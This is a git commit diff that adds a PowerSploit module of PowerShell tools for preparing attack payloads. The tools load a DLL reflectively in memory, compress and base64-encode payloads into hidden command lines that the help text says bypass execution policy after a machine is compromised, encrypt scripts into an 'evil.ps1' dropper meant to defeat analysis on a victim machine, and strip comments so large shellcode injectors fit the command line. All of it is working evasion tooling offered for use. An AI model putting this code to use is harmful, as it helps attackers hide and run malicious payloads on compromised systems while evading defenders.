diff options
| author | bitform <matt@exploit-monday.com> | 2013-01-20 10:11:30 -0500 |
|---|---|---|
| committer | bitform <matt@exploit-monday.com> | 2013-01-20 10:11:30 -0500 |
| commit | c45f3361e28d62a58a168de7848a8ba94e76cc33 (patch) | |
| tree | cd7a9c0c984ee828878153c17b0f96fc93dedf98 /ScriptModification | |
| parent | e9b22e9ae2391d1dc362501c282248945b3ca467 (diff) | |
| download | PowerSploit-c45f3361e28d62a58a168de7848a8ba94e76cc33.tar.gz PowerSploit-c45f3361e28d62a58a168de7848a8ba94e76cc33.zip | |
Created a ScriptModification module.
* All scripts used to prepare and/or modify payload scripts were added
to the ScriptModification module.
* Added Remove-Comments - Strips comments and extra whitespace from a
script.
* Encrypt-Script was named to Out-EncryptedScript in order to conform to
proper PowerShell verbs.
Diffstat (limited to 'ScriptModification')
| -rw-r--r-- | ScriptModification/Out-CompressedDll.ps1 | 81 | ||||
| -rw-r--r-- | ScriptModification/Out-EncodedCommand.ps1 | 184 | ||||
| -rw-r--r-- | ScriptModification/Out-EncryptedScript.ps1 | 129 | ||||
| -rw-r--r-- | ScriptModification/Remove-Comments.ps1 | 156 | ||||
| -rw-r--r-- | ScriptModification/ScriptModification.psd1 | 88 | ||||
| -rw-r--r-- | ScriptModification/ScriptModification.psm1 | 1 | ||||
| -rw-r--r-- | ScriptModification/Usage.txt | 12 |
7 files changed, 651 insertions, 0 deletions
diff --git a/ScriptModification/Out-CompressedDll.ps1 b/ScriptModification/Out-CompressedDll.ps1 new file mode 100644 index 0000000..f781c15 --- /dev/null +++ b/ScriptModification/Out-CompressedDll.ps1 @@ -0,0 +1,81 @@ +function Out-CompressedDll
+{
+<#
+.SYNOPSIS
+
+Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
+
+PowerSploit Module - Out-CompressedDll
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
+
+.PARAMETER FilePath
+
+Specifies the path to a managed executable.
+
+.EXAMPLE
+
+C:\PS> Out-CompressedDll -FilePath evil.dll
+
+Description
+-----------
+Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.
+
+.NOTES
+
+Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load.
+
+.LINK
+
+http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html
+#>
+
+ [CmdletBinding()] Param (
+ [Parameter(Mandatory = $True)]
+ [String]
+ $FilePath
+ )
+
+ $Path = Resolve-Path $FilePath
+
+ if (! [IO.File]::Exists($Path))
+ {
+ Throw "$Path does not exist."
+ }
+
+ $FileBytes = [System.IO.File]::ReadAllBytes($Path)
+
+ if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ')
+ {
+ Throw "$Path is not a valid executable."
+ }
+
+ $Length = $FileBytes.Length
+ $CompressedStream = New-Object IO.MemoryStream
+ $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
+ $DeflateStream.Write($FileBytes, 0, $FileBytes.Length)
+ $DeflateStream.Dispose()
+ $CompressedFileBytes = $CompressedStream.ToArray()
+ $CompressedStream.Dispose()
+ $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes)
+
+ Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))"
+
+ $Output = @"
+`$EncodedCompressedFile = @'
+$EncodedCompressedFile
+'@
+`$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
+`$UncompressedFileBytes = New-Object Byte[]($Length)
+`$DeflatedStream.Read(`$UncompressedFileBytes, 0, $Length) | Out-Null
+[Reflection.Assembly]::Load(`$UncompressedFileBytes)
+"@
+
+ Write-Output $Output
+}
\ No newline at end of file diff --git a/ScriptModification/Out-EncodedCommand.ps1 b/ScriptModification/Out-EncodedCommand.ps1 new file mode 100644 index 0000000..99d3f66 --- /dev/null +++ b/ScriptModification/Out-EncodedCommand.ps1 @@ -0,0 +1,184 @@ +function Out-EncodedCommand
+{
+<#
+.SYNOPSIS
+
+Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
+
+PowerSploit Module - Out-EncodedCommand
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.
+
+.PARAMETER ScriptBlock
+
+Specifies a scriptblock containing your payload.
+
+.PARAMETER Path
+
+Specifies the path to your payload.
+
+.PARAMETER NoExit
+
+Outputs the option to not exit after running startup commands.
+
+.PARAMETER NoProfile
+
+Outputs the option to not load the Windows PowerShell profile.
+
+.PARAMETER NonInteractive
+
+Outputs the option to not present an interactive prompt to the user.
+
+.PARAMETER Wow64
+
+Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations.
+
+.PARAMETER WindowStyle
+
+Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden.
+
+.PARAMETER EncodedOutput
+
+Base-64 encodes the entirety of the output. This is usually unnecessary and effectively doubles the size of the output. This option is only for those who are extra paranoid.
+
+.EXAMPLE
+
+C:\PS> Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}
+
+powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
+
+.EXAMPLE
+
+C:\PS> Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput
+
+powershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=
+
+Description
+-----------
+Execute the above payload for the lulz. >D
+
+.NOTES
+
+This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)
+
+.LINK
+
+http://www.exploit-monday.com
+#>
+
+ [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param (
+ [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]
+ [ValidateNotNullOrEmpty()]
+ [ScriptBlock]
+ $ScriptBlock,
+
+ [Parameter(Position = 0, ParameterSetName = 'FilePath' )]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Path,
+
+ [Switch]
+ $NoExit,
+
+ [Switch]
+ $NoProfile,
+
+ [Switch]
+ $NonInteractive,
+
+ [Switch]
+ $Wow64,
+
+ [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')]
+ [String]
+ $WindowStyle,
+
+ [Switch]
+ $EncodedOutput
+ )
+
+ if ($PSBoundParameters['Path'])
+ {
+ Get-ChildItem $Path -ErrorAction Stop | Out-Null
+ $ScriptBytes = [IO.File]::ReadAllBytes((Resolve-Path $Path))
+ }
+ else
+ {
+ $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($ScriptBlock)
+ }
+
+ $CompressedStream = New-Object IO.MemoryStream
+ $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
+ $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
+ $DeflateStream.Dispose()
+ $CompressedScriptBytes = $CompressedStream.ToArray()
+ $CompressedStream.Dispose()
+ $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
+
+ # Generate the code that will decompress and execute the payload.
+ # This code is intentionally ugly to save space.
+ $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
+
+ # Base-64 strings passed to -EncodedCommand must be unicode encoded.
+ $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
+ $EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
+
+ # Build the command line options
+ # Use the shortest possible command-line arguments to save space. Thanks @obscuresec for the idea.
+ $CommandlineOptions = New-Object String[](0)
+ if ($PSBoundParameters['NoExit'])
+ { $CommandlineOptions += '-NoE' }
+ if ($PSBoundParameters['NoProfile'])
+ { $CommandlineOptions += '-NoP' }
+ if ($PSBoundParameters['NonInteractive'])
+ { $CommandlineOptions += '-NonI' }
+ if ($PSBoundParameters['WindowStyle'])
+ { $CommandlineOptions += "-W $($PSBoundParameters['WindowStyle'])" }
+
+ $CmdMaxLength = 8190
+
+ # Build up the full command-line string. Default to outputting a fully base-64 encoded command.
+ # If the fully base-64 encoded output exceeds the cmd.exe character limit, fall back to partial
+ # base-64 encoding to save space. Thanks @Carlos_Perez for the idea.
+ if ($PSBoundParameters['Wow64'])
+ {
+ $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -C `"$NewScript`""
+
+ if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)
+ {
+ $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -E `"$EncodedPayloadScript`""
+ }
+
+ if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))
+ {
+ $CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -C `"$NewScript`""
+ }
+ }
+ else
+ {
+ $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -C `"$NewScript`""
+
+ if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)
+ {
+ $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -E `"$EncodedPayloadScript`""
+ }
+
+ if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))
+ {
+ $CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -C `"$NewScript`""
+ }
+ }
+
+ if ($CommandLineOutput.Length -gt $CmdMaxLength)
+ {
+ Write-Warning 'This command exceeds the cmd.exe maximum allowed length!'
+ }
+
+ Write-Output $CommandLineOutput
+}
\ No newline at end of file diff --git a/ScriptModification/Out-EncryptedScript.ps1 b/ScriptModification/Out-EncryptedScript.ps1 new file mode 100644 index 0000000..1376673 --- /dev/null +++ b/ScriptModification/Out-EncryptedScript.ps1 @@ -0,0 +1,129 @@ +function Out-EncryptedScript {
+
+<#
+.SYNOPSIS
+
+Encrypts text files/scripts.
+
+PowerSploit Module - Out-EncryptedScript
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Out-EncryptedScript will encrypt a script (or any text file for that matter) and output the results to a minimally obfuscated script - evil.ps1.
+
+.PARAMETER ScriptPath
+
+Path to this script
+
+.PARAMETER Password
+
+Password to encrypt/decrypt the script
+
+.PARAMETER Salt
+
+Salt value for encryption/decryption. This can be any string value.
+
+.EXAMPLE
+
+C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty
+
+Description
+-----------
+Encrypt the contents of this file with a password and salt. This will make analysis of the script impossible without the correct password and salt combination. This command will generate evil.ps1 that can dropped onto the victim machine. It only consists of a decryption function 'de' and the base64-encoded ciphertext.
+
+.EXAMPLE
+
+C:\PS> [String] $cmd = Get-Content .\evil.ps1
+C:\PS> Invoke-Expression $cmd
+C:\PS> $decrypted = de password salt
+C:\PS> Invoke-Expression $decrypted
+
+Description
+-----------
+This series of instructions assumes you've already encrypted a script and named it evil.ps1. The contents are then decrypted and the unencrypted script is called via Invoke-Expression
+
+.NOTES
+
+This command can be used to encrypt any text-based file/script
+
+.LINK
+
+http://www.exploit-monday.com
+#>
+
+[CmdletBinding()] Param (
+ [Parameter(Position = 0, Mandatory = $True)]
+ [String]
+ $ScriptPath,
+
+ [Parameter(Position = 1, Mandatory = $True)]
+ [String]
+ $Password,
+
+ [Parameter(Position = 2, Mandatory = $True)]
+ [String]
+ $Salt,
+
+ [Parameter(Position = 3)]
+ [String]
+ $InitializationVector = ( @( foreach ($i in 1..16) { [Char](Get-Random -Min 0x41 -Max 0x5B) } ) -join '' ), # Generate random 16 character IV
+
+ [Parameter(Position = 4)]
+ [String]
+ $FilePath = '.\evil.ps1'
+)
+
+$AsciiEncoder = New-Object System.Text.ASCIIEncoding
+$ivBytes = $AsciiEncoder.GetBytes("CRACKMEIFYOUCAN!")
+# While this can be used to encrypt any file, it's primarily designed to encrypt itself.
+[Byte[]] $scriptBytes = Get-Content -Encoding byte -Path $ScriptPath
+$DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2)
+$Key = New-Object System.Security.Cryptography.RijndaelManaged
+$Key.Mode = [System.Security.Cryptography.CipherMode]::CBC
+[Byte[]] $KeyBytes = $DerivedPass.GetBytes(32)
+$Encryptor = $Key.CreateEncryptor($KeyBytes, $ivBytes)
+$MemStream = New-Object System.IO.MemoryStream
+$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
+$CryptoStream.Write($scriptBytes, 0, $scriptBytes.Length)
+$CryptoStream.FlushFinalBlock()
+$CipherTextBytes = $MemStream.ToArray()
+$MemStream.Close()
+$CryptoStream.Close()
+$Key.Clear()
+$Cipher = [Convert]::ToBase64String($CipherTextBytes)
+
+# Generate encrypted PS1 file. All that will be included is the base64-encoded ciphertext and a slightly 'obfuscated' decrypt function
+$Output = 'function de([String] $b, [String] $c)
+{
+$a = "'
+$Output += $cipher
+$Output += '"'
+$Output += ';
+$encoding = New-Object System.Text.ASCIIEncoding;
+$dd = $encoding.GetBytes("CRACKMEIFYOUCAN!");
+$aa = [Convert]::FromBase64String($a);
+$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($b, $encoding.GetBytes($c), "SHA1", 2);
+[Byte[]] $e = $derivedPass.GetBytes(32);
+$f = New-Object System.Security.Cryptography.RijndaelManaged;
+$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
+[Byte[]] $h = New-Object Byte[]($aa.Length);
+$g = $f.CreateDecryptor($e, $dd);
+$i = New-Object System.IO.MemoryStream($aa, $True);
+$j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read);
+$r = $j.Read($h, 0, $h.Length);
+$i.Close();
+$j.Close();
+$f.Clear();
+return $encoding.GetString($h,0,$h.Length);
+}'
+
+# Output decrypt function and ciphertext to evil.ps1
+Out-File -InputObject $Output -Encoding ASCII $FilePath
+
+Write-Verbose "Encrypted PS1 file saved to: $(Resolve-Path $FilePath)"
+
+}
\ No newline at end of file diff --git a/ScriptModification/Remove-Comments.ps1 b/ScriptModification/Remove-Comments.ps1 new file mode 100644 index 0000000..64c3e31 --- /dev/null +++ b/ScriptModification/Remove-Comments.ps1 @@ -0,0 +1,156 @@ +function Remove-Comments
+{
+<#
+.SYNOPSIS
+
+Strips comments and extra whitespace from a script.
+
+PowerSploit Module - Remove-Comments
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+.DESCRIPTION
+
+Remove-Comments strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.
+
+A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee!
+
+.PARAMETER ScriptBlock
+
+Specifies a scriptblock containing your script.
+
+.PARAMETER Path
+
+Specifies the path to your script.
+
+.EXAMPLE
+
+C:\PS> $Stripped = Remove-Comments -Path .\ScriptWithComments.ps1
+
+.EXAMPLE
+
+C:\PS> Remove-Comments -ScriptBlock {
+### This is my awesome script. My documentation is beyond reproach!
+ Write-Host 'Hello, World!' ### Write 'Hello, World' to the host
+### End script awesomeness
+}
+
+Write-Host 'Hello, World!'
+
+.EXAMPLE
+
+C:\PS> Remove-Comments -Path Inject-Shellcode.ps1 | Out-EncodedCommand
+
+Description
+-----------
+Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.
+
+.INPUTS
+
+System.String, System.Management.Automation.ScriptBlock
+
+Accepts either a string containing the path to a script or a scriptblock.
+
+.OUTPUTS
+
+System.Management.Automation.ScriptBlock
+
+Remove-Comments returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.
+
+.LINK
+
+http://www.exploit-monday.com
+http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/
+#>
+
+ [CmdletBinding( DefaultParameterSetName = 'FilePath' )] Param (
+ [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Path,
+
+ [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ScriptBlock' )]
+ [ValidateNotNullOrEmpty()]
+ [ScriptBlock]
+ $ScriptBlock
+ )
+
+ Set-StrictMode -Version 2
+
+ if ($PSBoundParameters['Path'])
+ {
+ Get-ChildItem $Path -ErrorAction Stop | Out-Null
+ $ScriptBlockString = [IO.File]::ReadAllText((Resolve-Path $Path))
+ $ScriptBlock = [ScriptBlock]::Create($ScriptBlockString)
+ }
+ else
+ {
+ # Convert the scriptblock to a string so that it can be referenced with array notation
+ $ScriptBlockString = $ScriptBlock.ToString()
+ }
+
+ # Tokenize the scriptblock and return all tokens except for comments
+ $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptBlock, [Ref] $Null) | Where-Object { $_.Type -ne 'Comment' }
+
+ $StringBuilder = New-Object Text.StringBuilder
+
+ # The majority of the remaining code comes from Lee Holmes' Show-ColorizedContent script.
+ $CurrentColumn = 1
+ $NewlineCount = 0
+ foreach($CurrentToken in $Tokens)
+ {
+ # Now output the token
+ if(($CurrentToken.Type -eq 'NewLine') -or ($CurrentToken.Type -eq 'LineContinuation'))
+ {
+ $CurrentColumn = 1
+ # Only insert a single newline. Sequential newlines are ignored in order to save space.
+ if ($NewlineCount -eq 0)
+ {
+ $StringBuilder.AppendLine() | Out-Null
+ }
+ $NewlineCount++
+ }
+ else
+ {
+ $NewlineCount = 0
+
+ # Do any indenting
+ if($CurrentColumn -lt $CurrentToken.StartColumn)
+ {
+ # Insert a single space in between tokens on the same line. Extraneous whiltespace is ignored.
+ if ($CurrentColumn -ne 1)
+ {
+ $StringBuilder.Append(' ') | Out-Null
+ }
+ }
+
+ # See where the token ends
+ $CurrentTokenEnd = $CurrentToken.Start + $CurrentToken.Length - 1
+
+ # Handle the line numbering for multi-line strings
+ if(($CurrentToken.Type -eq 'String') -and ($CurrentToken.EndLine -gt $CurrentToken.StartLine))
+ {
+ $LineCounter = $CurrentToken.StartLine
+ $StringLines = $(-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd] -split '`r`n')
+
+ foreach($StringLine in $StringLines)
+ {
+ $StringBuilder.Append($StringLine) | Out-Null
+ $LineCounter++
+ }
+ }
+ # Write out a regular token
+ else
+ {
+ $StringBuilder.Append((-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd])) | Out-Null
+ }
+
+ # Update our position in the column
+ $CurrentColumn = $CurrentToken.EndColumn
+ }
+ }
+
+ Write-Output ([ScriptBlock]::Create($StringBuilder.ToString()))
+}
\ No newline at end of file diff --git a/ScriptModification/ScriptModification.psd1 b/ScriptModification/ScriptModification.psd1 new file mode 100644 index 0000000..df07db5 --- /dev/null +++ b/ScriptModification/ScriptModification.psd1 @@ -0,0 +1,88 @@ +@{
+
+# Script module or binary module file associated with this manifest.
+ModuleToProcess = 'ScriptModification.psm1'
+
+# Version number of this module.
+ModuleVersion = '1.0.0.0'
+
+# ID used to uniquely identify this module
+GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'
+
+# Author of this module
+Author = 'Matthew Graeber'
+
+# Company or vendor of this module
+CompanyName = ''
+
+# Copyright statement for this module
+Copyright = 'BSD 3-Clause'
+
+# Description of the functionality provided by this module
+Description = 'PowerSploit Script Preparation/Modification Module'
+
+# Minimum version of the Windows PowerShell engine required by this module
+PowerShellVersion = '2.0'
+
+# Name of the Windows PowerShell host required by this module
+# PowerShellHostName = ''
+
+# Minimum version of the Windows PowerShell host required by this module
+# PowerShellHostVersion = ''
+
+# Minimum version of the .NET Framework required by this module
+# DotNetFrameworkVersion = ''
+
+# Minimum version of the common language runtime (CLR) required by this module
+# CLRVersion = ''
+
+# Processor architecture (None, X86, Amd64) required by this module
+# ProcessorArchitecture = ''
+
+# Modules that must be imported into the global environment prior to importing this module
+# RequiredModules = @()
+
+# Assemblies that must be loaded prior to importing this module
+# RequiredAssemblies = @()
+
+# Script files (.ps1) that are run in the caller's environment prior to importing this module.
+# ScriptsToProcess = ''
+
+# Type files (.ps1xml) to be loaded when importing this module
+# TypesToProcess = @()
+
+# Format files (.ps1xml) to be loaded when importing this module
+# FormatsToProcess = @()
+
+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
+# NestedModules = @()
+
+# Functions to export from this module
+FunctionsToExport = '*'
+
+# Cmdlets to export from this module
+CmdletsToExport = '*'
+
+# Variables to export from this module
+VariablesToExport = ''
+
+# Aliases to export from this module
+AliasesToExport = ''
+
+# List of all modules packaged with this module.
+ModuleList = @(@{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'})
+
+# List of all files packaged with this module
+FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1',
+ 'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.txt'
+
+# Private data to pass to the module specified in RootModule/ModuleToProcess
+# PrivateData = ''
+
+# HelpInfo URI of this module
+# HelpInfoURI = ''
+
+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
+# DefaultCommandPrefix = ''
+
+}
\ No newline at end of file diff --git a/ScriptModification/ScriptModification.psm1 b/ScriptModification/ScriptModification.psm1 new file mode 100644 index 0000000..5bb81d3 --- /dev/null +++ b/ScriptModification/ScriptModification.psm1 @@ -0,0 +1 @@ +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file diff --git a/ScriptModification/Usage.txt b/ScriptModification/Usage.txt new file mode 100644 index 0000000..ddff666 --- /dev/null +++ b/ScriptModification/Usage.txt @@ -0,0 +1,12 @@ +To install this module, drop the entire PETools folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
+
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+
+To use the module, type `Import-Module ScriptModification`
+
+To see the commands imported, type `Get-Command -Module ScriptModification`
+
+For help on each individual command, Get-Help is your friend.
+
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
\ No newline at end of file |